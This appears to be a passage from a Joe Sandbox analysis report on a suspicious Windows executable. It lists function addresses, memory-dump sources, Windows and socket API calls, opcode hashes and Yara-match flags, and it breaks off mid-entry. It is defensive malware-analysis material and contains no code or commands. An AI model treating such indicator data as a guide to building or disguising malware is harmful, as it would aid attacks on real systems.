                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ExchangeInterlockedVersion
                                                                  • String ID:
                                                                  • API String ID: 2700998522-0
                                                                  • Opcode ID: fa637219dcb6ddefd1dc1d55d5a327db195db7b17277ef8bb2a0d14e08055a6d
                                                                  • Instruction ID: 3a7e4525dc7a34d43c83ccbe12fd313a321d05de6078f0345b72363439ac9122
                                                                  • Opcode Fuzzy Hash: fa637219dcb6ddefd1dc1d55d5a327db195db7b17277ef8bb2a0d14e08055a6d
                                                                  • Instruction Fuzzy Hash: 72E0EC30204300DFD7209F54D909A1A7AADFB4D306F80887AF18A95291D7384A09CA9E
                                                                  Function 00418BEC Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _strlen.LIBCMT ref: 00418BF2
                                                                  • EnumSystemLocalesA.KERNEL32(00418802,00000001,?,0043C8F0,00415C9D,?,0043F8E8,?), ref: 00418C0C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: EnumLocalesSystem_strlen
                                                                  • String ID:
                                                                  • API String ID: 216762292-0
                                                                  • Opcode ID: af7db56d72ed45a790bc46703473d5ea6f920e1862c7ba19386442c6a8e6d391
                                                                  • Instruction ID: ab2b32ddf79db2692935bc03276d87ced33d4c672e83320b00fb7b34fae71ec8
                                                                  • Opcode Fuzzy Hash: af7db56d72ed45a790bc46703473d5ea6f920e1862c7ba19386442c6a8e6d391
                                                                  • Instruction Fuzzy Hash: 8DD05EF0E212056AE7009F32EC0A7A03B91FF10B18F80693AD840C10F0C7B905498F0C
                                                                  Function 02263F20 Relevance: 2.6, Strings: 2, Instructions: 96COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: UI$dD
                                                                  • API String ID: 0-2678678791
                                                                  • Opcode ID: 5b0b6e09fcfe7a652f9b1521d2d76371d588ae290acbf1882c862c8981155b4e
                                                                  • Instruction ID: 6f52b354575d9084c7a4023e886d2dbd8dcaf998273635de255599546392f3d8
                                                                  • Opcode Fuzzy Hash: 5b0b6e09fcfe7a652f9b1521d2d76371d588ae290acbf1882c862c8981155b4e
                                                                  • Instruction Fuzzy Hash: A941F2B65083838BD394CF24E54A51BBBF0FB90724F440E5DE4A1962A4D3B5DA4DCB93
                                                                  Function 021C5ABE Relevance: 2.6, Strings: 2, Instructions: 96COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21c0000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: UI$dD
                                                                  • API String ID: 0-2678678791
                                                                  • Opcode ID: 5b0b6e09fcfe7a652f9b1521d2d76371d588ae290acbf1882c862c8981155b4e
                                                                  • Instruction ID: 3e12829f2cb7aff65b3fd4a5f92a301cd08870b8b818d65b0cb3f88d336d3106
                                                                  • Opcode Fuzzy Hash: 5b0b6e09fcfe7a652f9b1521d2d76371d588ae290acbf1882c862c8981155b4e
                                                                  • Instruction Fuzzy Hash: 3341F2B65083879BD354CF28D54651BBBF0FB90724F440E1DE4A1A62A0D3B8DA4DCB93
                                                                  Function 02263D10 Relevance: 2.6, Strings: 2, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: UI$dD
                                                                  • API String ID: 0-2678678791
                                                                  • Opcode ID: 82085eb77aa1e6d6502ea5e6256e2cd79fe0ef0b357a1ba66029e8c86d29f621
                                                                  • Instruction ID: 007ac94e162897d134f6faa9c9467b0719cd48d219ea796b740da29f59fe1021
                                                                  • Opcode Fuzzy Hash: 82085eb77aa1e6d6502ea5e6256e2cd79fe0ef0b357a1ba66029e8c86d29f621
                                                                  • Instruction Fuzzy Hash: A231B1B2508342AFD3849E2AC54612EBBF0BB90724F45CD5DE0E9861A4D3B88985CF42
                                                                  Function 021C58AE Relevance: 2.6, Strings: 2, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21c0000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: UI$dD
                                                                  • API String ID: 0-2678678791
                                                                  • Opcode ID: 82085eb77aa1e6d6502ea5e6256e2cd79fe0ef0b357a1ba66029e8c86d29f621
                                                                  • Instruction ID: c1e5e63c765a47ddbc6c602fc2ab28a7b4c9255d5bb7fb0b5cf5838d50223e31
                                                                  • Opcode Fuzzy Hash: 82085eb77aa1e6d6502ea5e6256e2cd79fe0ef0b357a1ba66029e8c86d29f621
                                                                  • Instruction Fuzzy Hash: 7A31C1B6508342AFD3849E2AC54611FFBF0BB90724F45CD5DE0E9961A0D3B88989CF43
                                                                  Function 02263BA0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: UI$UI
                                                                  • API String ID: 0-658841096
                                                                  • Opcode ID: 8fb8486042db03a29a3c642504b4275772910a8ab76727c30505b2b065e064e3
                                                                  • Instruction ID: 990d12f970d8bf97d0cfe27fe29172c6b0c6bf5e3a947797f7a6073be5ba8644
                                                                  • Opcode Fuzzy Hash: 8fb8486042db03a29a3c642504b4275772910a8ab76727c30505b2b065e064e3
                                                                  • Instruction Fuzzy Hash: 9631D0B6509342AFD394CE29C64A61FBBF0BB84B24F44CD5DE4E9921A4D3788909DF43
                                                                  Function 021C573E Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21c0000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: UI$UI
                                                                  • API String ID: 0-658841096
                                                                  • Opcode ID: 8fb8486042db03a29a3c642504b4275772910a8ab76727c30505b2b065e064e3
                                                                  • Instruction ID: 5fcc4380fb13b0623dd06b499120913ce438d0d84127ac438cb1bf7d40be6382
                                                                  • Opcode Fuzzy Hash: 8fb8486042db03a29a3c642504b4275772910a8ab76727c30505b2b065e064e3
                                                                  • Instruction Fuzzy Hash: CA31EFB5509341AFD394CE2AC64A20FBBF0BB94B24F44CD5DE4E9921A4D3788909DF43
                                                                  Function 004231F4 Relevance: 1.9, APIs: 1, Instructions: 440COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: f893e32024cc97c0f11b1f3e2839eed4c28d1c5f41f0bfa770a2e77184df27b5
                                                                  • Instruction ID: 901a5aa9de5700cd8805fd74d03597dde3c1393465a7cb497cc3f3327d4adc24
                                                                  • Opcode Fuzzy Hash: f893e32024cc97c0f11b1f3e2839eed4c28d1c5f41f0bfa770a2e77184df27b5
                                                                  • Instruction Fuzzy Hash: 43E16C70700229FFDB14DF55E880ABE77B9AF08305F90855AF809DA251CB3DEA11DB69
                                                                  Function 004176FA Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(?,00001004,00000100,00000006,00000100,?,00000000), ref: 0041771A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: f76e3b4d4471f4c66b76ce8a93458748984b06eba2c9d6b0da996760908f6c6f
                                                                  • Instruction ID: cda65a7a198a35491f7c29b90344dcb8de6f19e36f368a6941582af77952f65c
                                                                  • Opcode Fuzzy Hash: f76e3b4d4471f4c66b76ce8a93458748984b06eba2c9d6b0da996760908f6c6f
                                                                  • Instruction Fuzzy Hash: 2BE0D831E04208FBDB10EBE5E841FDD7BB86B04358F1002B6F621E62D0E77496808B9D
                                                                  Function 0040422C Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • bind.WS2_32(?,00000002,00000002), ref: 00404237
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: bind
                                                                  • String ID:
                                                                  • API String ID: 1187836755-0
                                                                  • Opcode ID: 357a37a49d7c55f24a8612a1d8d1b8f9ae8685624b5926de1135be1f1f2c08a2
                                                                  • Instruction ID: 563b0403b3f79a615a8ae29b8206f48719e22b9d3b9c145db1e4d11a6d396cae
                                                                  • Opcode Fuzzy Hash: 357a37a49d7c55f24a8612a1d8d1b8f9ae8685624b5926de1135be1f1f2c08a2
                                                                  • Instruction Fuzzy Hash: A9C04C3A214101BBCB151B74DC4588EBE61AF59365B64C62DF166C40F1D732C4B2EF01
                                                                  Function 0042BEDB Relevance: 1.5, APIs: 1, Instructions: 6networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: recv
                                                                  • String ID:
                                                                  • API String ID: 1507349165-0
                                                                  • Opcode ID: 19bdaf471ee6dafd773427f37cb1505c1f221814ee7f410de8433d3b8c05ccbf
                                                                  • Instruction ID: ec6d93857c044c47258bb710b424fe056a3bdafe9e50abbb2a23464235fe1066
                                                                  • Opcode Fuzzy Hash: 19bdaf471ee6dafd773427f37cb1505c1f221814ee7f410de8433d3b8c05ccbf
                                                                  • Instruction Fuzzy Hash: 0CC0483A008200FFCA024F80CD04C0ABFA2AB98324F04C818B2A80003083338022EF12
                                                                  Function 0041214A Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_000120FC), ref: 0041214F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: 77bad9887b666e86859ec61eac98c859dba75a19735e22f03c7f00950bc51da9
                                                                  • Instruction ID: 1ef7eac5f3493147800b58c48d8e3c71f82a7f330468b2e38a083a892f4386fa
                                                                  • Opcode Fuzzy Hash: 77bad9887b666e86859ec61eac98c859dba75a19735e22f03c7f00950bc51da9
                                                                  • Instruction Fuzzy Hash: 92A01270641300874300CF305D06600395072043013609832E401C1120D6B00086D608
                                                                  Function 0041215E Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00412163
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: 578763765f9fc8566c9495fa1d5a428746aebeb8fb0c5daef46d5a8d52c84602
                                                                  • Instruction ID: f50ff6ed31935d374f0f654db4034b012da08d7b86791a5e4fe0d61d64b66849
                                                                  • Opcode Fuzzy Hash: 578763765f9fc8566c9495fa1d5a428746aebeb8fb0c5daef46d5a8d52c84602
                                                                  • Instruction Fuzzy Hash:
                                                                  Function 021C9DDE Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21c0000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: J
                                                                  • API String ID: 0-2715717022
                                                                  • Opcode ID: 9b2aa766b6f360a6032440e5340912928a874ebab550b6d52b42b550c637d21c
                                                                  • Instruction ID: b2e0b935167b1fafb2987675b49aa54d4ca6d6a52bac6b582cabc2a3e2fa18a8
                                                                  • Opcode Fuzzy Hash: 9b2aa766b6f360a6032440e5340912928a874ebab550b6d52b42b550c637d21c
                                                                  • Instruction Fuzzy Hash: A661EF76A483019FC718DF68C984A2FB7E2BBD4354F24892CF495AB290D774D909CB83
                                                                  Function 02261C70 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ,
                                                                  • API String ID: 0-48859977
                                                                  • Opcode ID: 05cd4833b57480e6658f2eda0df086b86299641aa674d3f54235dc78241d0a24
                                                                  • Instruction ID: 7187b7afdd339539ddbf8d0d93e107001e1b3647a449b6bfa7efb2d918c9b49a
                                                                  • Opcode Fuzzy Hash: 05cd4833b57480e6658f2eda0df086b86299641aa674d3f54235dc78241d0a24
                                                                  • Instruction Fuzzy Hash: 6F416D76A083069FC758EFA8E45812AB7E2AFC4314F00CD2DE4D687254EB7499158F82
                                                                  Function 021C380E Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21c0000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ,
                                                                  • API String ID: 0-48859977
                                                                  • Opcode ID: f7fa7f053b15b3b9bc5260059ed6039f3f15b89ed0c9b9de4249ee0e0695fea7
                                                                  • Instruction ID: d42f9b19fcb6303a803e1255991ebc5012a589cb5b545adcc1df40b218eacb7b
                                                                  • Opcode Fuzzy Hash: f7fa7f053b15b3b9bc5260059ed6039f3f15b89ed0c9b9de4249ee0e0695fea7
                                                                  • Instruction Fuzzy Hash: 5E418B74A093029FC758EFA9D85412AB7E2BFD0314F00C92DE4D697260EB78D9098F82
                                                                  Function 021C095E Relevance: .4, Instructions: 362COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21c0000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4003efdb1b82660489297cf81d9eb3b1a92828f19abc9c79053ce197bdd8e6b4
                                                                  • Instruction ID: 95098c659b7b316fb844f3011324dda32821350ec32ec3ff75f46a658c7ca03a
                                                                  • Opcode Fuzzy Hash: 4003efdb1b82660489297cf81d9eb3b1a92828f19abc9c79053ce197bdd8e6b4
                                                                  • Instruction Fuzzy Hash: 2FF1F5B8A41209EFDB04CF94C990BAEB7B5BF5C304F208598E916AB345D775EA41CF90
                                                                  Function 021C0456 Relevance: .1, Instructions: 80COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21c0000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                                                  • Instruction ID: 9802b7dcc1a5b64f98980c37fdcbdc93eb48ff07e91f4580621f6d11f12c18d0
                                                                  • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                                                  • Instruction Fuzzy Hash: A5318F7AA4474ACFC710DF18C48092BB7E4FF99318F1609ADE99587312D734E946CB91
                                                                  Function 0040E658 Relevance: .1, Instructions: 77COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7cd0e825c18cab67390afa4095cd2c0ef4cc4a4a1ddd955d0601115f156ff26c
                                                                  • Instruction ID: ab5976e4691acd30db67047bee70cfeddbfbf72eaf8120044587c8c4a2e010f3
                                                                  • Opcode Fuzzy Hash: 7cd0e825c18cab67390afa4095cd2c0ef4cc4a4a1ddd955d0601115f156ff26c
                                                                  • Instruction Fuzzy Hash: DF21B8729002049BCB10EF6AC8C0967BBA5FF84350B4689ADDD559B286E734F925C7E0
                                                                  Function 02264E20 Relevance: .0, Instructions: 2COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                  • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                  • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                  • Instruction Fuzzy Hash:
                                                                  Function 021C69BE Relevance: .0, Instructions: 2COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21c0000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
